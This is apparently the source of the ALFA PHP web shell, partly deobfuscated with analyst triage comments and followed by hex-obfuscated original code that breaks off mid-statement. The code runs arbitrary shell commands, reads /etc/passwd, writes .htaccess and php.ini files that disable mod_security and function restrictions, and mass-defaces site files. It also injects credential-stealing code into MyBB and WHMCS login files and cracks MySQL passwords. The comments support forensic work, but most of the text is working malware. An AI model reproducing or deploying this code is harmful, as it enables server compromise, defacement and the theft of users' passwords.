<form onsubmit="g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>"; if (isset($_POST["alfa9"]) && $_POST["alfa9"] == ">>") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $user = ''; if (function_exists("posix_getpwuid") && function_exists("fileowner")) { if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) { $user = $user["name"]; } } else { if (_alfa_can_runCommand(true, true)) { $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep); } } if (!empty($user) && $user != "root") { echo __pre() . "<center><table border='1'><tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">{$user}</font></b></td></tr><tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; } else { echo __pre() . "<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>"; } } else { $site = trim($_POST["alfa7"]); $rep = str_replace(array("https://", "http://", "www."), '', $site); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $ex = explode(":", $boz); if ($ex[0] == $rep) { echo __pre() . "<center><table border='1'>\xa<tr><td><b><font color="#FFFFFF">User: </b></font></td><td><b><font color="#FF0000">" . trim($ex[1]) . "</font></b></td></tr>
<tr><td><b><font color="#FFFFFF">site: </b></font></td><td><b><font color="#FF0000">{$rep}</font></b></td></tr></table></center>"; break; } } } } } if (!empty($_POST["alfa5"]) && isset($_POST["alfa5"])) { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $i = 0; while ($i < 60000) { $line = @posix_getpwuid($i); if (!empty($line)) { while (list($key, $vl) = each($line)) { echo $vl . "\xa"; break; } } $i++; } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); foreach ($users as $boz) { $user = explode(":", $boz); echo trim($user[1]) . "<br>"; } } } if (!empty($_POST["alfa4"]) && isset($_POST["alfa4"])) { echo __pre(); if (_alfa_can_runCommand(true, true)) { echo __read_file("/etc/passwd"); } elseif (function_exists("posix_getpwuid")) { for ($uid = 0; $uid < 60000; $uid++) { $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "{$val}:"; } echo "\xa"; } } } else { __alert("failed..."); } } if (!empty($_POST["alfa2"]) && isset($_POST["alfa2"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible
<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off\xa</IfModule>"); echo "<center><b><big>htaccess for Apache created...!</center></b></big>"; } if (!empty($_POST["alfa1"]) && isset($_POST["alfa1"])) { @__write_file($GLOBALS["cwd"] . "php.ini", "safe_mode=OFF\xadisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)"); echo "<center><b><big> php.ini created...!</center></b></big>"; } if (!empty($_POST["alfa3"]) && isset($_POST["alfa3"])) { @__write_file($GLOBALS["cwd"] . ".htaccess", "#Generated By Sole Sad and Invisible\xa<Files *.php>
ForceType application/x-httpd-php4\xa</Files>\xa<IfModule mod_security.c>\xaSecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"); echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>"; } echo "<br></div>"; alfafooter(); } goto EoAWA;
// alfaMassDefacer(): prints the "Mass Defacer" form and, when POST alfa4 equals ">>", iterates the
// directory given in POST alfa1 (it must be a readable directory, and POST alfa2 must name an
// existing file). Sub-directories are passed to Alfa_ReadDir() and every file that is both readable
// and writable to Alfa_Rewriter(), together with the page path (alfa2) and the method (alfa3,
// "index" or "all" per the form). Both helpers are defined outside this excerpt, so what they write
// is not visible here. The entry equal to $GLOBALS["__file_path"] is skipped.
// Triage note: a burst of file modifications under one directory tree within a single request,
// with one file left untouched, is consistent with this routine having run - confirm against
// file-integrity or backup data.
K8RV4: function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit="g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;" method='post'>"; echo "<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>\xa	Mass dir: <input size="50" id="target" type="text" name="massdir" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">
\x9DefPage: <input size="50" type="text" name="defpage" value="" . htmlspecialchars($GLOBALS["cwd"]) . ""></div> <input type="submit" name="btn" value=" "></center></p>
</form>"; $dir = $_POST["alfa1"]; $defpage = $_POST["alfa2"]; $method = $_POST["alfa3"]; $fCurrent = $GLOBALS["__file_path"]; if ($_POST["alfa4"] == ">>") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . $file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert("<font color="red">Error In OpenDir...</font>"); } } else { __alert("<font color="red">DefPage File NotFound...</font>"); } } else { __alert("<font color="red">Directory is not Readable...</font>"); } } else { __alert("<font color="red">Mass Dir is Invalid Dir...</font>"); } } else { __alert("<font color="red">Dir is Empty...</font>"); } } echo "</div>"; alfafooter(); } goto Xrfh9;
// _AlfaSecretKey(): returns the value of the "AlfaSecretKey" cookie; when the cookie is absent it
// generates a value with uniqid(mt_rand(), true), stores it through __alfa_set_cookie() (defined
// outside this excerpt) and returns that. The cookie name is a fixed string and can be searched for
// in web-server or proxy logs that record request cookies.
L6Kl6: function _AlfaSecretKey() { $secret = @$_COOKIE["AlfaSecretKey"]; if (!isset($_COOKIE["AlfaSecretKey"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("AlfaSecretKey", $secret); } return $secret; } goto PuSe1;
// _alfa_php_cmd($in, $re): passes the command string $in to the first available of exec, passthru,
// system, shell_exec, popen, proc_open, or the COM "WScript.shell" object, and returns the output it
// captured (an empty string if nothing ran). When $re is true, " 2>&1" is appended to $in first.
// Any Exception is caught and discarded. Each branch is gated on function_exists(), which reports
// false for functions listed in PHP's disable_functions, so that setting removes the matching
// branch. On the host, use of this function would appear as child processes of the PHP worker.
KtNd0: function _alfa_php_cmd($in, $re = false) { $out = ''; try { if ($re) { $in = $in . " 2>&1"; } if (function_exists("exec")) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @popen($in, "r"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("proc_open")) { $pipes = array(); $process = @proc_open($in . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("COM")) { $alfaWs = new COM("WScript.shell"); $exec = $alfaWs->exec("cmd.exe /c " . $_POST["alfa1"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } goto GIU6h;
// hijackMybb($path, $saveto): targets $path/member.php. If that file exists, is writable and
// contains the string "$loginhandler->complete_login();", the string is replaced by a snippet
// followed by the original call; the snippet appends username, password and e-mail to the file
// named by $saveto and de-duplicates its lines. The outcome is reported through hijackOutput()
// (defined outside this excerpt): 0 with $saveto on success, 1 otherwise.
// Response note: compare member.php with the vendor copy for the installed version, look for the
// fopen/fwrite block ahead of complete_login(), and treat credentials of accounts that logged in
// while the modification was present as exposed.
qpgQy: function hijackMybb($path, $saveto) { $code = "$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = '".$user['username']."'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user['username']." : ". $user['password']." ( ".$alfa_fetch['email']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);"; $find = "$loginhandler->complete_login();"; $code = str_replace("{saveto_path}", $saveto, $code); $login = $path . "/member.php"; $evil_login = "	" . $code . "
	" . $find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L8sC_;
// Fallback definition: when mb_strlen() does not exist, declares it as a wrapper around strlen()
// (the second argument is ignored).
dptXn: if (!function_exists("mb_strlen")) { function mb_strlen($str, $c = '') { return strlen($str); } } goto JM3pb;
// alfaconfig_grabber(): prints the "Config Grabber" form and, when POST alfa5 equals ">>", calls
// Alfa_ConfigGrabber() with the directory from POST alfa2 and the extension from POST alfa3.
// Alfa_ConfigGrabber() is defined outside this excerpt; the form text suggests it collects files
// by extension ("* = all Ext") - confirm against its definition.
P95rf: function alfaconfig_grabber() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>"; echo "<form name="srch" onSubmit="g('config_grabber',null,null,this.dir.value,this.ext.value,null,'>>');return false;" method='post'>\xa\x9<div class="txtfont">\xa	Dir: <input size="50" id="target" type="text" name="dir" value="" . $GLOBALS["cwd"] . "">
	Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
	<input type="submit" name="btn" value=" "></div></form></center><br>"; $dir = $_POST["alfa2"]; $ext = $_POST["alfa3"]; if ($_POST["alfa5"] == ">>") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "</div>"; alfafooter(); } goto RiRhw;
// Appends "/" to $GLOBALS["cwd"] when its last character is not already "/".
FN_bJ: if ($GLOBALS["cwd"][strlen($GLOBALS["cwd"]) - 1] != "/") { $GLOBALS["cwd"] .= "/"; } goto jL3tA;
// Settings lookup: every key of $GLOBALS["DB_NAME"] is matched on its first two characters
// (us, pa, sa, lo, sh, po, cg); the value is copied to a fixed key (user, pass, safemode,
// login_page, show_icons, post_encryption, cgi_api) and the original key is kept under
// "<name>_rand". Presumably the stored keys carry a per-sample suffix - confirm against the
// part of the file that fills DB_NAME.
r05Ia: foreach ($GLOBALS["DB_NAME"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS["DB_NAME"]["user"] = $value; $GLOBALS["DB_NAME"]["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS["DB_NAME"]["pass"] = $value; $GLOBALS["DB_NAME"]["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS["DB_NAME"]["safemode"] = $value; $GLOBALS["DB_NAME"]["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS["DB_NAME"]["login_page"] = $value; $GLOBALS["DB_NAME"]["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS["DB_NAME"]["show_icons"] = $value; $GLOBALS["DB_NAME"]["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS["DB_NAME"]["post_encryption"] = $value; $GLOBALS["DB_NAME"]["post_encryption_rand"] = $key; } elseif ($prefix == "cg") { $GLOBALS["DB_NAME"]["cgi_api"] = $value; $GLOBALS["DB_NAME"]["cgi_api_rand"] = $key; } } goto GuGa9; qyBzk: ?>


Original Code

<?php  } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_exists("\143\x75\x72\x6c\137\166\145\x72\x73\x69\157\x6e")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["\123\x45\122\x56\x45\122\137\101\x44\104\122"] ? function_exists("\147\x65\x74\150\x6f\x73\x74\x62\171\156\x61\x6d\145") ? @gethostbyname($_SERVER["\123\x45\122\126\x45\x52\x5f\116\x41\x4d\105"]) : "\77\77\x3f\77" : @$_SERVER["\x53\105\122\126\105\122\137\101\104\x44\122"]; $flag = $curl->Send("\x68\x74\164\160\72\57\x2f\167\x77\167\x2e\x67\x65\157\160\x6c\x75\x67\x69\156\x2e\x6e\x65\164\57\152\x73\157\156\56\x67\x70\77\151\160\75" . $server_addr); $flag2 = $curl->Send("\150\x74\164\x70\x3a\x2f\57\167\x77\167\x2e\147\x65\157\x70\x6c\x75\x67\x69\x6e\56\x6e\x65\x74\57\152\163\x6f\x6e\56\x67\160\x3f\151\160\x3d" . $_SERVER["\x52\105\115\x4f\x54\105\x5f\x41\104\x44\122"]); if (strpos($flag2, "\147\x65\157\160\x6c\165\x67\x69\156") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag["\147\x65\157\x70\154\x75\147\151\x6e\x5f\x63\x6f\165\156\164\162\171\x43\157\x64\x65"])) { $flags["\163\145\x72\x76\x65\162"]["\156\141\x6d\145"] = $flag["\x67\x65\157\x70\x6c\165\x67\x69\x6e\x5f\x63\x6f\165\x6e\164\162\171\x4e\x61\155\145"]; $flags["\x73\145\162\166\x65\x72"]["\x63\x6f\x64\x65"] = $flag["\x67\x65\157\160\x6c\x75\147\151\156\x5f\x63\x6f\x75\x6e\x74\162\x79\103\x6f\x64\145"]; } if (!empty($flag2["\x67\x65\157\x70\154\x75\x67\x69\156\137\143\x6f\165\156\x74\x72\x79\x43\x6f\144\145"])) { $flags["\x63\x6c\151\x65\x6e\x74"]["\156\141\155\x65"] = $flag2["\x67\x65\x6f\160\154\x75\x67\151\156\137\143\x6f\165\156\x74\162\171\x4e\x61\x6d\145"]; $flags["\x63\x6c\151\145\156\x74"]["\x63\x6f\144\145"] = $flag2["\x67\x65\157\x70\154\x75\x67\151\156\137\x63\x6f\165\156\x74\162\x79\x43\157\x64\145"]; } } } echo json_encode($flags); } goto Q03qj; ppnhy: if 
(!isset($GLOBALS["\x44\102\x5f\x4e\x41\x4d\x45"]["\154\x6f\x67\x69\156\x5f\160\141\147\145"])) { die("\x24\x47\x4c\117\102\x41\114\x53\x5b\47\104\x42\x5f\x4e\x41\115\x45\x27\x5d\x5b\47\x6c\x6f\147\x69\x6e\x5f\160\x61\147\145\x27\x5d"); } goto TMWW9; XTnlF: function __pre() { return "\74\160\x72\x65\x20\x69\x64\x3d\42\x73\x74\162\117\x75\x74\x70\x75\164\42\40\x73\x74\171\x6c\x65\x3d\42\155\141\x72\147\x69\x6e\55\x74\157\x70\x3a\x35\x70\x78\x22\x20\x63\x6c\x61\x73\x73\x3d\42\155\x6c\61\x22\x3e"; } goto KOYJ5; FVVeJ: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("\45\x31\x2e\x32\x66", $s / 1073741824) . "\40\107\x42"; } elseif ($s >= 1048576) { return sprintf("\45\61\56\62\146", $s / 1048576) . "\40\x4d\x42"; } elseif ($s >= 1024) { return sprintf("\45\61\x2e\62\146", $s / 1024) . "\x20\113\x42"; } else { return $s . "\40\x42"; } } goto dfoFS; fCNwV: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["\164\x61\x72\x67\145\164"] . "\x3a" . $info["\x70\157\x72\164"], $info["\x75\x73\145\x72\x6e\141\x6d\x65"], $info["\x70\141\x73\163\x77\x6f\x72\144"])) { CrackerResualt($info); echo "\125\x73\x65\162\116\141\x6d\145\72\40\x3c\146\x6f\x6e\164\40\143\x6f\154\x6f\x72\75\42\162\145\x64\x22\76" . $info["\x75\x73\x65\162\x6e\x61\x6d\x65"] . "\x3c\x2f\146\157\x6e\x74\76\x20\120\x61\x73\163\127\157\162\x64\72\x20\x3c\x66\x6f\x6e\x74\x20\x63\157\x6c\x6f\x72\75\42\162\x65\144\x22\x3e" . $info["\160\141\163\x73\167\157\162\144"] . 
"\x3c\57\x66\157\156\164\x3e\x3c\x66\x6f\x6e\164\x20\x63\x6f\x6c\157\x72\75\42\x67\162\145\145\156\42\76\40\x20\114\157\147\151\156\40\x53\165\x63\143\145\163\x73\56\x2e\x2e\x2e\x3c\x2f\x66\157\x6e\164\76\74\x62\162\76"; } } goto i2b2c; kS5vr: function hijackWhmcs($path, $saveto) { $code = "\74\x3f\160\x68\160\x20\x69\146\50\151\x73\x73\x65\164\x28\44\137\x50\117\x53\124\x5b\47\165\163\x65\162\x6e\141\155\x65\x27\135\x29\x20\101\116\104\x20\151\163\163\145\164\x28\x24\x5f\120\x4f\123\124\x5b\47\160\x61\x73\163\x77\157\162\x64\x27\x5d\x29\40\x41\116\104\40\41\x65\155\x70\164\171\x28\x24\137\120\117\123\x54\133\x27\165\x73\145\162\156\x61\155\x65\47\135\x29\40\101\116\104\x20\x21\145\x6d\x70\164\x79\x28\44\137\x50\117\x53\124\x5b\47\160\141\x73\163\167\x6f\x72\x64\x27\x5d\51\x29\173\151\146\50\x24\141\154\146\141\x5f\x63\x6f\x6e\x6e\x65\143\164\75\x40\x6d\171\x73\161\x6c\151\137\143\157\x6e\156\145\x63\164\x28\44\144\142\137\150\157\x73\x74\54\44\x64\x62\137\x75\163\145\x72\x6e\141\x6d\145\x2c\44\144\142\x5f\160\x61\163\x73\x77\x6f\x72\x64\54\44\144\x62\137\156\x61\x6d\x65\51\x29\x7b\x24\x61\x6c\146\141\x5f\x66\151\x6c\145\x20\75\40\x22\173\x73\141\166\x65\x74\x6f\137\x70\x61\164\150\175\x22\73\x24\141\x6c\146\141\x5f\165\156\x61\x6d\145\x20\x3d\x20\x40\x24\137\120\x4f\x53\x54\133\47\x75\x73\x65\162\156\x61\x6d\x65\47\x5d\73\x24\141\154\x66\x61\x5f\x70\x77\x20\x3d\40\x40\x24\x5f\120\x4f\x53\124\133\x27\x70\x61\163\x73\167\157\x72\x64\x27\135\x3b\151\x66\x28\x69\163\163\x65\x74\50\44\137\x50\117\x53\x54\133\x27\x6c\x61\156\x67\x75\141\x67\x65\47\x5d\51\x29\173\x24\x61\154\x66\141\137\161\x20\75\x20\42\123\x45\x4c\x45\x43\x54\40\52\x20\106\x52\117\115\40\x74\x62\154\141\x64\x6d\x69\x6e\163\40\127\x48\x45\x52\x45\x20\x60\165\x73\x65\162\x6e\x61\x6d\x65\x60\40\75\40\x27\44\x61\154\x66\141\x5f\165\x6e\141\155\145\47\x20\101\x4e\104\x20\x60\x70\141\163\163\x77\x6f\x72\x64\x60\x20\75\40\x27\42\56\x6d\144\x35\x28\44\x61\x6c\146\141\137\160\x77\x29\x2e\42\x27\x22\73\44\x61\x64
\x6d\151\156\40\x3d\x20\x74\x72\165\x65\x3b\175\x65\x6c\163\145\x7b\x24\x61\154\x66\x61\x5f\x71\40\x3d\x20\x22\x53\x45\x4c\105\103\124\x20\52\40\106\x52\117\x4d\x20\164\142\154\143\154\151\145\x6e\164\x73\x20\127\110\x45\x52\105\x20\x60\145\155\141\x69\x6c\140\x20\75\x20\x27\44\x61\154\146\141\137\x75\x6e\x61\x6d\145\x27\42\73\44\x61\144\155\151\x6e\40\x3d\40\x66\141\x6c\x73\x65\73\x7d\x24\141\154\x66\141\137\x71\165\145\162\x79\x20\75\40\x6d\171\163\x71\154\151\x5f\x71\x75\x65\x72\x79\x28\x24\x61\x6c\146\x61\137\143\157\156\x6e\145\143\164\x2c\x20\x24\x61\154\146\141\137\x71\x29\x3b\151\x66\x28\x6d\171\163\x71\x6c\151\x5f\156\165\x6d\x5f\162\x6f\167\163\50\x24\141\x6c\x66\141\137\x71\165\145\x72\171\x29\40\x3e\x20\60\x20\51\173\x24\x72\x6f\167\40\x3d\x20\x6d\x79\163\161\x6c\151\137\146\145\164\143\150\137\x61\x72\162\141\171\x28\44\x61\x6c\146\141\x5f\161\165\145\162\x79\51\x3b\44\x61\154\154\157\x77\40\75\x20\x74\162\x75\x65\73\x69\x66\50\x21\x24\141\x64\155\151\156\51\x7b\x24\x5f\137\x73\141\154\x74\40\75\x20\145\170\x70\154\157\144\x65\50\x27\72\x27\54\x20\44\162\157\167\133\x27\160\141\163\x73\167\x6f\x72\144\47\135\x29\x3b\44\x5f\x5f\x65\x6e\x63\120\x57\40\x3d\x20\x6d\x64\65\50\44\137\x5f\163\x61\154\164\133\61\x5d\56\x24\x5f\x50\x4f\123\x54\x5b\47\160\141\x73\x73\167\157\x72\144\x27\x5d\51\56\x27\72\x27\56\44\x5f\137\163\141\154\164\x5b\x31\135\x3b\151\x66\x28\44\x72\157\167\x5b\x27\160\x61\x73\163\167\x6f\x72\x64\x27\135\x20\x3d\x3d\40\x24\137\137\x65\156\x63\120\x57\x29\173\x24\141\x6c\154\157\167\40\75\x20\x74\162\x75\x65\x3b\x24\x72\157\167\x5b\x27\x75\163\x65\x72\x6e\x61\155\x65\x27\135\x20\75\x20\x24\x72\157\167\x5b\x27\x65\155\x61\151\x6c\x27\135\73\175\145\154\163\x65\173\x24\141\x6c\x6c\157\x77\40\x3d\40\146\x61\154\x73\145\73\x7d\175\x69\x66\50\44\141\154\154\157\x77\x29\x7b\x24\146\160\40\x3d\40\x40\146\157\160\x65\x6e\x28\x24\x61\x6c\x66\x61\x5f\x66\x69\154\x65\x2c\x20\x22\x61\53\42\x29\x3b\x40\146\167\162\151\x74\145\50\44\x66\160\54\40\44\162\15
7\x77\x5b\47\x75\163\x65\162\x6e\141\x6d\x65\x27\135\x20\56\40\47\40\x3a\x20\x27\x20\x2e\x20\x20\44\x61\154\146\141\x5f\160\x77\x2e\x22\x20\x28\42\x20\56\x20\44\x72\157\x77\x5b\42\x65\x6d\141\151\154\42\135\40\x2e\40\42\x29\40\x3a\x20\x22\56\50\44\x61\144\x6d\151\156\40\77\40\47\x69\163\137\141\x64\x6d\151\x6e\47\x20\72\x20\x27\x69\163\x5f\165\163\x65\x72\47\51\56\42\134\x6e\x22\x29\x3b\100\146\x63\x6c\x6f\x73\145\50\x24\x66\x70\51\x3b\x24\146\40\75\x20\x40\x66\151\x6c\x65\50\44\141\154\146\141\x5f\146\x69\x6c\x65\x29\73\x24\156\x65\x77\x20\75\x20\x61\162\x72\141\171\137\x75\x6e\x69\x71\x75\145\x28\44\x66\51\73\x24\146\x70\40\75\40\100\x66\x6f\x70\145\x6e\x28\x24\141\x6c\x66\x61\x5f\x66\x69\154\145\54\40\42\167\42\51\x3b\146\157\162\x65\x61\x63\150\50\x24\x6e\x65\167\40\141\x73\x20\44\x76\141\154\x75\145\x73\x29\173\100\x66\x77\162\151\x74\x65\x28\44\146\160\54\x20\x24\x76\141\x6c\165\145\163\x29\x3b\175\100\x66\143\x6c\157\163\145\x28\x24\146\160\51\x3b\x7d\175\x7d\x7d\x3f\x3e"; $code = str_replace("\173\x73\141\166\145\164\x6f\137\x70\141\164\150\175", $saveto, $code); $conf = $path . "\x2f\143\157\156\146\151\x67\x75\162\141\164\x69\157\156\56\x70\150\x70"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, "\x3f\x3e")) { $code = "\x3f\x3e" . $code; } $evil_conf = $data_conf . "\xa" . 
$code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto qpgQy; kr6dX: function alfacloudflare() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "\x3c\x64\x69\x76\x20\x63\x6c\141\163\163\75\150\x65\x61\144\x65\x72\76\74\x63\145\x6e\x74\145\x72\x3e\74\x62\x72\76\x3c\x64\x69\166\40\x63\x6c\x61\x73\x73\x3d\x27\x74\x78\164\146\157\x6e\x74\137\x68\145\141\x64\x65\x72\47\76\174\40\103\x6c\x6f\165\x64\x20\x46\154\141\162\145\x20\102\x79\x50\x61\163\163\x65\162\x20\174\x3c\57\144\151\x76\x3e\x3c\142\x72\76\74\x66\157\162\x6d\40\141\143\164\151\157\x6e\x3d\47\x27\40\157\x6e\163\165\142\x6d\151\164\75\x22\x67\50\x27\x63\x6c\x6f\165\x64\x66\x6c\141\x72\x65\x27\54\156\x75\154\x6c\x2c\x74\150\151\x73\x2e\x75\162\154\56\x76\141\154\x75\x65\54\47\x3e\x3e\47\x29\x3b\x20\x72\x65\x74\x75\x72\156\x20\146\x61\x6c\163\x65\x3b\42\40\x6d\x65\164\150\x6f\144\x3d\x27\x70\157\163\164\47\x3e\12\74\x70\x3e\74\144\151\166\x20\x63\154\x61\163\163\75\47\164\170\x74\146\x6f\x6e\164\47\76\124\x61\x72\147\145\x74\x3a\x3c\x2f\x64\x69\166\x3e\x20\x3c\x69\x6e\x70\165\x74\40\164\171\160\145\x3d\47\164\145\170\x74\47\40\x73\x69\x7a\x65\x3d\x33\x30\40\x6e\141\x6d\145\75\47\165\162\154\47\x20\163\x74\171\154\x65\75\47\x74\145\170\x74\55\x61\x6c\x69\x67\156\x3a\143\145\156\164\145\162\x3b\47\40\x70\x6c\141\x63\x65\x68\157\x6c\x64\145\162\x3d\x22\x74\x61\162\147\145\x74\x2e\143\157\155\x22\x3e\x20\74\151\x6e\160\x75\164\40\x74\x79\x70\145\75\47\163\x75\142\x6d\151\x74\47\40\156\x61\155\145\x3d\x27\x67\157\47\40\166\141\154\165\x65\x3d\47\40\47\40\x2f\x3e\74\57\x70\x3e\74\x2f\x66\157\162\155\x3e\74\x2f\143\x65\156\x74\x65\x72\x3e"; if ($_POST["\141\154\146\x61\x32"] && $_POST["\141\154\146\141\x32"] == "\76\76") { $url = $_POST["\x61\x6c\x66\x61\61"]; if (!preg_match("\x2f\x5e\50\x68\164\164\160\x73\77\x29\72\134\57\134\x2f\50\167\x7b\63\175\174\167\x33\51\x5c\56\x2f\151", $url)) { $url = 
preg_replace("\57\136\50\150\x74\x74\x70\163\77\x29\x3a\x5c\57\134\x2f\x2f", '', $url); $url = "\x68\164\x74\160\72\x2f\57\x77\x77\167\x2e" . $url; } $headers = @get_headers($url, 1); $server = $headers["\123\145\x72\x76\x65\x72"]; $subs = array("\x6f\167\x61\x2e", "\62\164\x74\x79\x2e", "\x6d\x2e", "\x67\x77\56", "\155\x78\x31\x2e", "\163\x74\x6f\x72\x65\56", "\61", "\62", "\x76\142\56", "\156\145\167\163\x2e", "\144\157\167\x6e\154\x6f\141\144\x2e", "\166\x69\144\145\x6f", "\143\x70\141\156\x65\x6c\56", "\x66\x74\x70\56", "\163\145\x72\x76\x65\162\61\56", "\143\x64\156\x2e", "\143\144\x6e\x32\x2e", "\156\163\x2e", "\156\x73\x33\56", "\x6d\141\151\x6c\x2e", "\167\x65\142\155\141\x69\x6c\56", "\144\151\x72\145\143\164\56", "\144\151\162\x65\x63\164\55\x63\x6f\156\x6e\145\143\x74\x2e", "\162\145\143\157\162\144\56", "\163\x73\x6c\x2e", "\144\156\163\x2e", "\150\x65\x6c\x70\x2e", "\142\x6c\x6f\x67\x2e", "\x69\x72\143\x2e", "\x66\x6f\x72\165\x6d\x2e", "\x64\x6c\56", "\x6d\171\x2e", "\143\160\x2e", "\160\157\162\164\x61\x6c\x2e", "\x6b\x62\x2e", "\163\x75\160\x70\x6f\162\x74\56", "\x73\x65\141\x72\143\150\56", "\x64\x6f\x63\163\56", "\146\151\x6c\x65\x73\x2e", "\141\x63\x63\157\x75\x6e\164\163\56", "\163\x65\143\165\x72\x65\56", "\162\x65\x67\x69\163\164\145\162\x2e", "\141\160\160\163\x2e", "\142\x65\x74\141\x2e", "\144\145\x6d\x6f\56", "\x73\155\x74\160\56", "\x6e\x73\x32\x2e", "\156\x73\61\x2e", "\163\145\162\x76\x65\x72\56", "\163\x68\157\160\x2e", "\150\x6f\163\164\x2e", "\167\145\x62\56", "\143\154\x6f\165\x64\56", "\x61\160\x69\x2e", "\145\170\x63\x68\x61\x6e\147\x65\x2e", "\x61\x70\160\56", "\x76\160\163\x2e", "\x6f\167\141\x2e", "\163\141\x74\56", "\142\142\x73\x2e", "\x6d\x6f\166\151\x65\x2e", "\x6d\x75\163\x69\143\x2e", "\x61\162\x74\56", "\x66\x75\163\151\x6f\156\56", "\155\141\x70\x73\x2e", "\x66\157\x72\x75\x6d\x73\x2e", "\141\143\x63\56", "\143\143\x2e", "\144\x65\x76\x2e", "\167\x77\64\62\56", "\x77\151\x6b\x69\56", "\x63\154\x69\145\x6e\x74\163\x2e", 
"\143\x6c\151\x65\156\x74\56", "\142\157\157\153\163\56", "\141\x6e\x73\167\x65\162\x73\x2e", "\163\145\x72\166\x69\143\x65\x2e", "\x67\x72\x6f\165\160\163\56", "\x69\155\141\x67\145\163\x2e", "\165\x70\154\157\141\x64\x2e", "\x75\x70\56", "\164\165\142\x65\x2e", "\x75\163\145\162\x73\x2e", "\141\144\155\x69\x6e\56", "\141\x64\x6d\x69\156\151\163\x74\x72\x61\x74\157\x72\x2e", "\x70\x72\151\x76\141\164\x65\56", "\144\145\163\151\x67\156\x2e", "\167\150\155\143\163\56", "\x77\x70\56", "\167\x6f\x72\x64\x70\162\145\163\x73\x2e", "\152\x6f\157\x6d\154\x61\56", "\x76\142\165\154\154\x65\164\x69\x6e\56", "\x74\145\x73\x74\56", "\144\x65\x76\x65\x6c\157\x70\x65\162\56", "\x70\x61\156\145\x6c\x2e", "\x63\157\156\x74\141\143\164\x2e"); if (preg_match("\x2f\x5e\50\150\x74\x74\160\x73\77\x29\x3a\x5c\57\134\x2f\x28\167\x7b\63\x7d\x7c\167\x33\51\134\x2e\57\x69", $url, $matches)) { if ($matches[2] != "\x77\167\x77") { $url = 